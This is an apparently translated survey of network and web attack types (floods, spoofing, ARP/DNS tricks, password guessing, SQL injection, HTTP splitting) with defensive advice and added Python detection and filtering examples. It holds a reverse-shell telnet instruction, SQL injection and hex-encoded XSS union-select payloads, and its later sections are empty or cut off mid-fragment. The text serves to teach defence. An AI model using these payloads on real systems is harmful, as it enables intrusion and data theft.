
Common security threats

Everyone probably knows that there are many different ways of endangering security. There are really plenty of them; how many, you will learn by reading under the cut.


All links used below are given only as examples; if any of them lead somewhere they should not, please do not hold the author responsible.

The same article is available at: forxakep.ucoz.ru/publ/3-1-0-16
forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116
www.inattack.ru/article/402.html

Phishing (or Fishing).
A very broad concept. Its purpose is to obtain information from users (passwords, credit card numbers, etc.) or money. This technique is directed not at one user but at many. For example, letters allegedly from the technical support service are sent to all known customers of a bank. The letters usually contain a request to send the account password, supposedly because of some technical work. Despite the fact that users are warned that no employee may demand such information and that it must not be disclosed, there are always those who are happy to “give away” their numbers, passwords and so on. Such letters are usually very believable and well written, which is probably what captivates gullible users. It should be noted that there are several phishing tricks besides letters. Some of the techniques below, when properly applied, are suitable for phishing (as a rule, we mention this when describing the technique).
Recommendations: Remember that paranoia is the best defense. Do not trust anything suspicious and do not give your data to anyone. Administrators do not need to know your password if it is meant for accessing their server: they fully control the server and can see the password themselves or change it.


Social engineering
Not a technical but a psychological technique. Using the data obtained during enumeration, the hacker can call any user (for example, of a corporate network) on behalf of the administrator and try to find out from him, for example, the password. This becomes possible because in large networks users do not know all the employees, and even less can they always recognize them by phone. In addition, sophisticated psychological techniques are used, so the chance of success increases greatly.
Recommendations: the same. If there really is a need, hand over the necessary data in person. If you write a password down on paper, do not leave it lying around, and destroy it thoroughly rather than simply throwing it in the trash.



Viruses.
The most common problem known to the user. The essence is the introduction of a malicious program into the user's computer. The consequences vary and depend on the type of virus with which the computer is infected, but in general they range from stealing information to sending spam, organizing DDoS attacks, and gaining complete control over the computer. Besides a file attached to a letter, viruses can get into the computer through some OS vulnerabilities, which are described in our article “Windows Vulnerability Rating”. There are a great many viruses, but it is still possible to classify them. We do not want to reinvent the wheel, so you can use the information on this page, school8.uriit.ru/people/av/class.html, where the virus classification is given with descriptions. The topic is covered in more detail here: fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm
Recommendations: Use antivirus software. Do not limit yourself to DrWEB or Kaspersky Anti-Virus alone (because they do not check the registry); use specialized anti-malware software such as Ad-Aware, SpyBot, XSpy. Also do not open suspicious attachments, and do not run programs from unknown senders at all. Even if the sender is familiar to you, check the file with an antivirus first anyway. Here, as in medicine, it is easier to prevent than to cure.



DoS (Denial of Service).
It should be said that this is not so much a separate attack as the result of an attack; it is used to disable a system or individual programs. To do this, the hacker forms a request to a program in a special way, after which the program stops functioning. A reboot is required to return the program to a working state. There is often an opinion that DoS is the same as a Flood attack, and that in general all attacks that lead to system failure should be combined under the general name DoS. It is worth mentioning that:

- There is no generally accepted terminology; there are rather unspoken rules by which an attack is classified, therefore even within this article we will give a somewhat conventional classification.
- As we have already said, not only Flood but also, for example, Buffer Overflow can lead to a denial of service.

Therefore, DoS can be characterized as the result of an attack. For example: “the effect of denial of service is achieved by the use of a Flood attack”.



Flood (Flooding)
This type is quite controversial; in part it can be attributed to DoS, but we would like to highlight it separately. From a certain number of machines (in this case the attack is called DDoS, Distributed Denial of Service), as a rule zombies, the maximum possible number of requests (for example, connection requests) is sent to the victim. Because of this the victim does not have time to respond to each request, and as a result does not respond to user requests, i.e. it can be said that it ceases to function normally. Note: this type of attack can also be simple hooliganism, for example when forums are filled with a large number of meaningless messages. The following types of flood can be distinguished:

--SYN Flood - flooding the attacked computer with SYN packets. As you know, a computer must respond to such a packet with a SYN/ACK packet. If there are too many SYN packets, the computer does not have time to respond to all of them and cannot receive packets from other computers.
--ICMP Flood or Ping Flood - the same, only with ICMP packets. The system must respond to each such packet, thereby generating a large number of packets that reduce the performance (throughput) of the channel.
--Identification Flood (Ident Flood) - similar to ICMP Flood, but responding to a request to port 113 (identd) takes the system more time, so the attack is more effective.
--DNS Flood - the attack is directed at a DNS server. It is flooded with DNS requests that the server does not have time to answer, so it will not be able to answer your requests either. As a result, you will not be able to visit Internet sites.
--DDoS DNS - the attack is quite new, and we have not come across a “well-established” name for it. In essence this technique is about the same as the previous one, with the only difference that the requests come from a large number of machines (the previous type does not exclude this either). The address to which the DNS server should send its responses to these requests is the address of the DNS server itself, i.e. it is not only flooded with DNS queries but also sends them to itself. Thus the technique is more effective than the previous one, but also more difficult to implement.
--Boink (Bonk, Teardrop) - a huge number of heavily fragmented packets is sent to the victim, and the fragments themselves are large. For each fragmented packet a special buffer is allocated, into which the remaining fragments will later be placed in order to reassemble them. A huge number of large fragments overflows the buffer and can cause a freeze or crash.
--Pong - the same as any of the types above, the only difference being that the sender's address is fake. This gives the hacker some anonymity.

Recommendations: they are specific to each OS or router and are usually given in the technical documentation. Do not neglect them; clearly limit the number of accepted packets. Unfortunately, some kinds cannot be repelled by anything other than physically shutting down. Properly configured firewalls are often a panacea.
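As an added example (not code from the article), here is a per-source SYN-rate check of the kind the recommendation above asks for, run over a constructed trace in a simplified tcpdump-like format; the addresses, the threshold and the window size are assumptions.

```python
import re
from collections import defaultdict, deque

# Constructed trace in a simplified tcpdump-like format (not real captured traffic).
# 203.0.113.5 sends eight bare SYNs within half a second and never completes a
# handshake; 198.51.100.7 performs a normal handshake (S, then S. back, then .).
SAMPLE_TRACE = """\
12:00:00.000100 IP 203.0.113.5.40001 > 192.0.2.10.80: Flags [S]
12:00:00.050200 IP 203.0.113.5.40002 > 192.0.2.10.80: Flags [S]
12:00:00.100300 IP 198.51.100.7.51000 > 192.0.2.10.80: Flags [S]
12:00:00.100900 IP 192.0.2.10.80 > 198.51.100.7.51000: Flags [S.]
12:00:00.101500 IP 198.51.100.7.51000 > 192.0.2.10.80: Flags [.]
12:00:00.150400 IP 203.0.113.5.40003 > 192.0.2.10.80: Flags [S]
12:00:00.200500 IP 203.0.113.5.40004 > 192.0.2.10.80: Flags [S]
12:00:00.250600 IP 203.0.113.5.40005 > 192.0.2.10.80: Flags [S]
12:00:00.300700 IP 203.0.113.5.40006 > 192.0.2.10.80: Flags [S]
12:00:00.350800 IP 203.0.113.5.40007 > 192.0.2.10.80: Flags [S]
12:00:00.400900 IP 203.0.113.5.40008 > 192.0.2.10.80: Flags [S]
12:00:05.000000 IP 198.51.100.7.51001 > 192.0.2.10.80: Flags [S]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def parse_line(line):
    """Return (seconds since midnight, src ip, dst ip, flags) or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    h, mi, s = m.group("ts").split(":")
    ts = int(h) * 3600 + int(mi) * 60 + float(s)
    return ts, m.group("src"), m.group("dst"), m.group("flags")


class SynWindow:
    """Per-source sliding-window counter of bare SYN segments."""

    def __init__(self, limit, window_s):
        self.limit = limit
        self.window_s = window_s
        self.history = defaultdict(deque)

    def observe(self, ts, src):
        """Record a SYN from src at time ts; return True if src now exceeds the limit."""
        q = self.history[src]
        while q and ts - q[0] > self.window_s:   # forget SYNs older than the window
            q.popleft()
        q.append(ts)
        return len(q) > self.limit


def detect_syn_flood(trace, limit=5, window_s=1.0):
    """Sorted list of sources that sent more than `limit` bare SYNs (SYN without ACK)
    within any `window_s` second window. Handshake replies and ACKs are not counted."""
    counter = SynWindow(limit, window_s)
    flagged = set()
    for line in trace.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, _dst, flags = parsed
        # "S" is a bare SYN; "S." is a SYN/ACK and "." a plain ACK.
        if flags == "S" and counter.observe(ts, src):
            flagged.add(src)
    return sorted(flagged)


if __name__ == "__main__":
    print("sources exceeding the SYN limit:", detect_syn_flood(SAMPLE_TRACE))
```

The same counter can feed a firewall rule that rate-limits new connections per source, which is the "limit the number of accepted packets" advice in practice.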



Smurf (an attack on errors in the TCP/IP protocol implementation)
Now this type of attack is considered exotic, but earlier, when the TCP/IP protocol was quite new, it contained a number of errors that allowed, for example, IP addresses to be forged. However, this type of attack is still in use. Some experts distinguish TCP Smurf, UDP Smurf and ICMP Smurf; naturally, such a division is based on the type of packets.
Recommendations: CISCO switches, like many others, provide good protection, as do newer software and firewalls; broadcast requests need to be blocked.


Ping-of-Death (or Jolt, SSPing)
The attack consists of sending the victim a fragmented ICMP packet, but the fragment size is very large (64 kB). Older OS versions, such as Windows 95, hang. This attack can be carried out using the Shadow Security Scanner program.
Recommendations: the easiest way is to upgrade the OS, abandoning the old version.


UDP Storm
It is used if at least two UDP ports are open on the victim, each of which sends some reply to the sender. For example, port 37 (the time service) returns the current date and time on request. The hacker sends a UDP packet to one of the victim's ports, but specifies the victim's address and the victim's second open UDP port as the sender. Then the two ports start responding to each other endlessly, which reduces performance. The storm stops as soon as one of the packets is lost (for example, due to resource overload).
Recommendations: if possible, stop using services that accept UDP packets, or cut them off from the external network with a firewall.


UDP Bomb
The attacker sends the system a UDP packet with incorrect service fields. The data can be corrupted in any way (for example, an incorrect field length or structure). This may lead to a crash.
Recommendations: update the software.


Land

The victim is sent a packet to a specific port in which the sender's address is set to the victim's own address and the sender's port equals the recipient's port (example: receiver 1.1.1.1 port 111, sender 1.1.1.1 port 111). The victim tries to establish a connection with itself, causing the system to hang. Such an attack can also be 100% effective against some routers.
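The Smurf, UDP Storm and Land attacks above all rely on packets that should never arrive the way they do: a source address from the victim's own network on the outside interface, an echo request to the broadcast address, or two always-answering UDP ports pointed at each other. As an added example that is not part of the article, here is a small stateless ingress filter that drops such packets; the network 192.0.2.0/24, the interface names, the port set and the sample packets are constructed.

```python
import ipaddress
from dataclasses import dataclass

# Assumed layout (constructed): the protected LAN is 192.0.2.0/24, the router's
# outside interface is "ext" and the inside interface is "int".
INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")
# UDP services that answer every datagram and so can be made to talk to each other
# (echo, daytime, chargen, time); the article's example is port 37 (time).
CHATTY_UDP_PORTS = {7, 13, 19, 37}


@dataclass
class Packet:
    iface: str            # interface the packet arrived on: "ext" or "int"
    proto: str            # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    icmp_type: int = -1   # 8 = echo request


def verdict(p: Packet) -> str:
    """Stateless ingress rules; returns "accept" or "drop: <reason>"."""
    src = ipaddress.ip_address(p.src)
    dst = ipaddress.ip_address(p.dst)
    # Land: source equals destination and source port equals destination port.
    if src == dst and p.sport == p.dport:
        return "drop: land"
    # Anti-spoofing: our own addresses never legitimately arrive from outside.
    # This also defeats UDP Storm and Smurf variants that forge a victim's address.
    if p.iface == "ext" and src in INTERNAL_NET:
        return "drop: spoofed internal source"
    # Smurf amplification: echo requests addressed to the broadcast address.
    if p.proto == "icmp" and p.icmp_type == 8 and dst == INTERNAL_NET.broadcast_address:
        return "drop: smurf broadcast echo"
    # UDP Storm: two always-answering UDP services pointed at each other.
    if p.proto == "udp" and p.sport in CHATTY_UDP_PORTS and p.dport in CHATTY_UDP_PORTS:
        return "drop: udp storm"
    return "accept"


def filter_packets(packets):
    """Apply verdict() to a list of packets, returning (src, dst, verdict) rows."""
    return [(p.src, p.dst, verdict(p)) for p in packets]


# Constructed sample packets, one per rule plus two legitimate ones.
SAMPLE = [
    Packet("ext", "tcp", "192.0.2.10", "192.0.2.10", 111, 111),          # Land
    Packet("ext", "udp", "192.0.2.10", "192.0.2.10", 37, 19),            # spoofed UDP Storm seed
    Packet("int", "udp", "192.0.2.20", "192.0.2.10", 37, 19),            # UDP Storm between LAN hosts
    Packet("ext", "icmp", "203.0.113.9", "192.0.2.255", icmp_type=8),   # Smurf
    Packet("ext", "tcp", "203.0.113.9", "192.0.2.10", 40000, 80),       # normal web request
    Packet("int", "udp", "192.0.2.20", "192.0.2.10", 5353, 37),         # normal time query
]

if __name__ == "__main__":
    for row in filter_packets(SAMPLE):
        print(row)
```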


Mail Bombing
If the attacked computer has a mail server, a huge number of e-mail messages are sent to it in order to disable it. On the one hand this resembles Flood, but on the other hand, if the messages contain large attachments that will be scanned by the server's antivirus, then checking many such incoming attachments can significantly reduce performance or bring it to nothing. In addition, such messages are stored on the server's hard disk and may fill it up, which can cause a DoS. Of course, now this attack is more of a history, but in some cases it can still be used.
Recommendations: competent configuration of the mail server.


Sniffing (listening on the network)
If hubs are installed in the network instead of switches, received packets are sent to all computers on the network, and each computer then determines whether the packet is meant for it or not. If an attacker gains access to a computer in such a network, or gains access to the network directly, then all information transmitted within the network segment, including passwords, becomes available to him. The intruder simply puts the network card into listening mode and accepts all packets regardless of whom they were intended for. Console sniffers can be used, for example TcpDump (built into *NIX systems) and WinDump (for Windows, but not built in), as well as ones with a graphical interface, for example Iris.
Recommendations: use switches instead of hubs, encrypt traffic.


IP Hijack
With physical access to the network, the hacker can “cut into” the network cable and act as an intermediary in the transmission of packets, thereby listening to all traffic between two computers. A very inconvenient method that often does not justify itself, except in cases where no other method can be implemented. Such a tap is inconvenient in itself, although there are devices that simplify the task a little; in particular, they keep track of packet numbering in order to avoid failures and possible detection of the intrusion into the channel. This method is used to defraud ATMs, but such a case is technically more difficult, because breaking the connection between the bank and the ATM is unacceptable, and “plugging into” the channel without breaking it is a task only for a highly qualified specialist. In addition, ATMs are now installed much better, which excludes free physical access to the cable.

Recommendations: watch access to cables, for example use a cable box. Encrypt traffic.


Dummy ARP (False ARP)
The ARP server, router or switch knows which IP addresses correspond to which MAC addresses (i.e. network cards). With physical access to the network, an attacker can forge an ARP response and impersonate another computer on the network by taking over its IP. Thereby all packets destined for that computer will be received by him. This is possible if that computer is turned off; otherwise this action will cause an IP address conflict (there cannot be two computers with the same IP address on the same network).
Recommendations: use software that reports changes of the MAC address associated with an IP, and watch the ARP server log files.


Dummy DNS Server (fake DNS server)
If the network settings are set to automatic, then when the network comes up the computer “asks” (that is, sends a broadcast packet) who will be its DNS server, to which it will later send its DNS requests. With physical access to the network, an attacker can intercept such a broadcast request and reply that his computer is the DNS server. After that he will be able to send the deceived victim along any route. For example, the victim wants to go to the bank's website and transfer money; the attacker can send it to his own computer, where the password entry form will be faked. After that the password belongs to the cracker. Quite a difficult method, because the hacker must answer the victim before the real DNS server does.

Recommendations: if possible, restrict outsiders' access to the network.


Fuzzy
Filters can be configured to block certain types of packets, such as UDP. A hacker can craft a packet so that the filter does not recognize it as a UDP packet and does not filter it, and it reaches its intended destination. Thus a cracker can bypass packet filters. This technique is very narrow and is intended for special cases, more precisely those where the connection does not have to be two-way. Two-way communication will be impossible in most cases, because usually if incoming packets of a certain type are blocked on a port, outgoing ones are blocked too. It turns out that even if the crafted packet passes through the filter (for example, on a UDP port), the server will respond to it with a packet of the same type, i.e. UDP, but it will not craft it the way the cracker did, so this outgoing packet will be filtered out and will not reach the cracker. Anyway, it is still worth protecting yourself from such attacks.
Recommendations: usually new versions of firewalls provide sufficient protection against this technique.


Puke
The cracker forges an ICMP unreachable response (remote system error), which causes the client to disconnect from the server. It is used rather as an aid when some client needs to be disconnected from the server in order to carry out an attack.

Fake unreachable
The cracker forges a message stating that the packet cannot be delivered (unreachable), thereby making the server think that the client has failed and packets are not reaching their destination. This can cause the server to disconnect the client. It is also an aid, similar to No. 17 (Puke), only directed not at the client but at the server.


IP-Spoofing (IP address substitution)
The attacker replaces his real IP with a fake one. This is necessary if only certain IP addresses have access to a resource: the hacker needs to change his real IP to a “privileged” or “trusted” one in order to gain access. This method can also be used differently. After two computers have established a connection with each other by checking passwords, the attacker can overload the victim's network resources with specially generated packets. In this way he can redirect traffic to himself and thus bypass the authentication procedure.
Recommendations: there may be a lot of them, because there are a lot of techniques. But it is worth mentioning that the threat is reduced (although this may hamper legitimate connections) by shortening the response time for packets with the SYN and ACK flags set, and by increasing the maximum number of SYN connection requests held in the queue (tcp_max_backlog). You can also use SYN cookies.

Host spoofing
A very complex technique that requires physical access to the network. Each computer knows the router to which it sends all packets, which the router then delivers to their destination. When the router is changed, a redirect notification is sent to each computer, after which the computers begin to send packets to the new router. A cracker can forge such a notification and impersonate the router, thereby gaining control over traffic within the network segment.
Recommendations: control access to the network and the moment of router change. For example, you can monitor whether all previous traffic (i.e. old connections) has “appeared” on the new router.


Password guessing.
Used to log into a system by guessing the account password. There are two types: trying all possible character combinations (brute force) and guessing by dictionary. The first method is more effective, because sooner or later it reaches the character combination that you typed as the password, but it is extremely slow, especially if punctuation marks and so on are taken into account. The second method is fast, but if you choose a word that cannot be in the dictionary, for example “My-New-Password”, it will be impossible to guess it using the dictionary. There are many programs for password guessing, so we do not think it makes sense to name specific ones. As a rule, programs, operating systems, etc. store passwords in encrypted form, so even if an attacker gains access to the file, he will still have to decrypt the password. He can do this for days on his home computer.
Recommendations: use complex passwords, preferably with punctuation. Limit the number of password entry attempts. Against decrypting the password, only its complexity will help.


Back Connect / Pipes / Reverse (Reverse Session)
This is an auxiliary technique, but very interesting in itself. For example, a hacker does not want to perform many actions every time for the sake of a single command. He can simplify the task using this technique. Its essence is that the hacker forces the attacked computer to connect to the hacker's computer. For example, on the attacked computer you can run the command telnet [hacker's IP] [port]. After that the hacker effectively receives a command line (command shell) on the attacked computer.


Software vulnerabilities
The use of bugs in software. The effect may vary, from obtaining insignificant information to gaining complete control over the system. Attacks through software bugs are the most popular at all times. Old errors are fixed in new versions, but new errors appear in new versions, which can be used again. Next we describe not types of attacks but the techniques used to attack software errors.
Recommendations: we give them once for all of them, because the recommendation is general: only “safely” written program code will help. You can find a large amount of material on this topic on the Internet.


Buffer Overflow
A very dangerous type of attack, in which a request is formed in such a way that it overflows the memory allocated for it, and the commands “stitched” into the request end up on the stack and are then executed by the processor. This can be done both remotely and locally, if the attacker can run his program on the attacked computer. It can be used both to execute code on the computer and to elevate privileges. There are several subtypes of buffer overflow attacks. We will not describe each of them, because to explain the principle we would have to give code examples that would be incomprehensible to people unfamiliar with programming. The following classification belongs to Andrei Kolischak (andr [at] sandy.ru) and is given in his article “Attacks on Buffer Overflow”, so you can find their descriptions, examples and recommendations directly in that article. We give them just for reference.

--- Attack “stack failure”
--- Attack “stack failure” with parameterization
--- Attack “stack failure” with control transfer
--- Distortion of function pointers
--- Attack on function pointers
--- Attack on function pointers with parameterization
--- Attack on function pointers with control transfer
--- Distortion of transition tables
--- Attack on transition tables
--- Attack on transition tables with parameterization
--- Attack on transition tables with control transfer
--- Distortion of data pointers
--- Attack with distorted data pointers
--- Attack with the distortion of data pointers with parameterization
--- Attack with the distortion of data pointers with the original code.

We would like to add one more type to the above classification: Integer Overflow. For more information, see the articles “Integer Overflow: Attack” and “Integer Overflow: Protection”, or “Basic Integer Overflows” by Blexim.


Shatter
A vulnerability in Windows systems that can only be exploited locally. It is very similar to a buffer overflow, or more precisely it leads to the same result: the attacker's commands end up on the stack. It is based on the fact that every window in Windows that has an input field has a maximum length for the input value. It is set at the program's development stage, and for small fields it can be, for example, 50. You cannot type more than 50 characters from the keyboard, but Windows is built on messages. You can easily obtain the handle of an input field (a special identifier known only to the OS) and send a SETTEXT (set text) message to that input field using this handle. The message can say that text longer than 50 characters must be set; accordingly, everything after the 50th character will go onto the stack and will be executed by the processor. There is no protection against this. The only panacea is AMD Athlon 64 processors, which have built-in protection and do not execute commands from the stack.


Nuke (WinNuke)
Now this is rather history. By default Windows uses the NetBIOS protocol for sharing files and printers on a network. For this the OS opens three TCP ports (137, 138, 139). The implementation of this protocol in older versions of Windows contained a vulnerability. The essence is that you can send several OutOfBand “messages” in a row to the open port 139. The system could not process such data correctly and hung. A lot of programs for such attacks have been written, but we will only mention Shadow Security Scanner, which we already named above as a tool for SSPing.


Cross User Attack (inter-user attack)
In our opinion a rather ambiguous name, since it does not reflect the essence of the attack in the best way, but we still stick to this well-known name. Squid 2.4 and ISA/2000 allow users to share TCP connections with the server. With the help of HRS (described below) it is possible to provoke two responses from the server, one of which will be monitored by the hacker, and to falsify the information received by the user.

Attack on CGI
Most WWW (Web) servers use scripts to provide users with additional services or features, for example mail servers like mail.ru. Many servers have “home-grown” CMS (Content Management Systems) installed. Programmers do not always make their scripts check user-entered values, which makes it possible to use such errors for various purposes. A buffer overflow attack can also be carried out through CGI script errors, for example: http://host/cgi-bin/helloworld?Type=A*100 (i.e. the letter A repeated 100 times). At http://www.opennet.ru/base/sec/linux_sec_guide.txt.html you can find an excellent article, the second part of which describes security issues that are usually ignored by CGI programmers. Many of them are not hacking techniques themselves but only help with hacking, so for writing good code it is better to get acquainted with that article. The scope of this article does not allow us to delve into the topic of writing safe code, so we only say that, at a minimum, all service characters must be filtered from the data received.


SQL Injection
If user input is used in generated SQL queries without validation, a cracker can enter data that will allow him to get any information from your SQL databases. For example, there is a query "SELECT login, password FROM members WHERE email='$email';", where $email is entered by the user in a form; the request is processed and the result is displayed on the page. A hacker can modify the data and enter into the form: my@mail.ru' OR login LIKE '%admin%. Thus the generated SQL query will be: "SELECT login, password FROM members WHERE email='my@mail.ru' OR login LIKE '%admin%';". As a result the hacker will receive the passwords of users whose login contains “admin”.
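As an added example (not code from the article), the query above built by string concatenation next to the same query with a bound parameter, both run with the article's input against a constructed in-memory SQLite table; the table contents are invented.

```python
import sqlite3


def make_db():
    """Constructed sample database mirroring the article's `members` table.
    Passwords are stored in plain text only to reproduce the article's query;
    a real system stores password hashes, never the passwords themselves."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (login TEXT, password TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [
            ("admin", "admin-secret", "admin@example.org"),
            ("siteadmin", "other-secret", "ops@example.org"),
            ("alice", "alice-secret", "alice@example.org"),
        ],
    )
    return conn


def lookup_vulnerable(conn, email):
    """The article's pattern: user input is pasted straight into the SQL text,
    so a quote in the input ends the string literal and the rest becomes SQL."""
    query = "SELECT login, password FROM members WHERE email='%s';" % email
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, email):
    """Same lookup with a bound parameter: the input is always a value, never SQL."""
    query = "SELECT login, password FROM members WHERE email=?;"
    return conn.execute(query, (email,)).fetchall()


# The input from the article.
ARTICLE_PAYLOAD = "my@mail.ru' OR login LIKE '%admin%"


def demo():
    """Run both lookups with the article's input plus one legitimate lookup."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, ARTICLE_PAYLOAD),
        "parameterized": lookup_parameterized(conn, ARTICLE_PAYLOAD),
        "legitimate": lookup_parameterized(conn, "alice@example.org"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable lookup returns every login containing "admin"; the parameterized one returns nothing for the same input, because the whole string is compared as an e-mail address.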


HRS (HTTP Resource Splitting)
A rather young and, in our opinion, complex technique (unless you use it only for XSS), which allows you to carry out attacks such as Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning and XSS (which will be described below). The essence of the attack is that a hacker, with a specially prepared HTTP request, can force a Web server that is vulnerable to HRS to respond to the victim (and not the hacker) with two separate HTTP responses (and not one, as would happen in a normal situation).
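As an added example that is not from the article, a redirect script that copies a user-supplied, percent-encoded parameter into the Location header, once as-is and once with the check that a header value may not contain CR, LF or other control characters; the parameter name, the sample input and the second "response" text are constructed.

```python
from urllib.parse import unquote


def build_redirect_naive(location):
    """Vulnerable: the decoded value is concatenated into the header block unchanged."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + location + "\r\n"
            "Content-Length: 0\r\n\r\n")


def build_redirect_safe(location):
    """Hardened: reject any CR, LF or other control character in the header value."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in location):
        raise ValueError("control character in header value")
    return build_redirect_naive(location)   # harmless once the value is validated


def handle_request(url_param, hardened):
    """Simulate the script: the parameter arrives percent-encoded, as in a query string,
    so the check must run on the decoded value, not on the raw parameter."""
    location = unquote(url_param)
    builder = build_redirect_safe if hardened else build_redirect_naive
    return builder(location)


def count_responses(raw):
    """Number of status lines a client would see, i.e. how many responses it parses."""
    return sum(1 for line in raw.split("\r\n") if line.startswith("HTTP/1."))


# Constructed attacker parameter: %0D%0A decodes to CR LF. After decoding it closes
# the redirect early and starts a second, attacker-controlled response.
SPLIT_PARAM = (
    "/index.html%0D%0AContent-Length:%200%0D%0A%0D%0A"
    "HTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A"
    "Content-Length:%2017%0D%0A%0D%0A%3Cp%3Einjected%3C/p%3E%0D%0A"
)
NORMAL_PARAM = "/index.html"


def demo():
    """How many responses each variant emits, and whether the hardened one refuses."""
    results = {
        "normal": count_responses(handle_request(NORMAL_PARAM, hardened=True)),
        "naive": count_responses(handle_request(SPLIT_PARAM, hardened=False)),
    }
    try:
        handle_request(SPLIT_PARAM, hardened=True)
        results["hardened"] = "accepted"
    except ValueError:
        results["hardened"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

Modern HTTP libraries apply the same control-character check to every header they send; the point of writing it out is that a script which assembles headers by hand, as here, gets no such protection.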


Cross User Defacement


Web Cache Poisoning

Browser Cache Poisoning


Hijacking Pages


CSS/XSS (Cross-Site Scripting)


SiXSS (SQL Injection Cross Site Scripting)
A combination of SQL Injection and XSS, i.e. XSS carried out through SQL Injection. The article's example payload is the hex string «3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E», which is the hex encoding of <script>alert("SiXSS");</script>, and the example request is www.victim.com/vuln_script.php?vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E, where vuln_script is the vulnerable script and vuln_variable its vulnerable parameter.


SiHRS (SQL Injection HTTP Resource Splitting)
The technique implements HTTP Resource Splitting via an SQL Injection vulnerability in a script. This becomes possible if the script, for example by an index, first retrieves an HTTP address from the SQL database, then generates its own HTTP request and substitutes the HTTP address obtained from the SQL database into its Location: field. This is quite often used in Internet site directories. We give an example of an HTTP header that can be used for SiHRS, in hexadecimal:
Select HEX('i.php
Content-Length: 0

HTTP/1.1 200 OK
Content-ty

Source: https://habr.com/ru/post/27704/

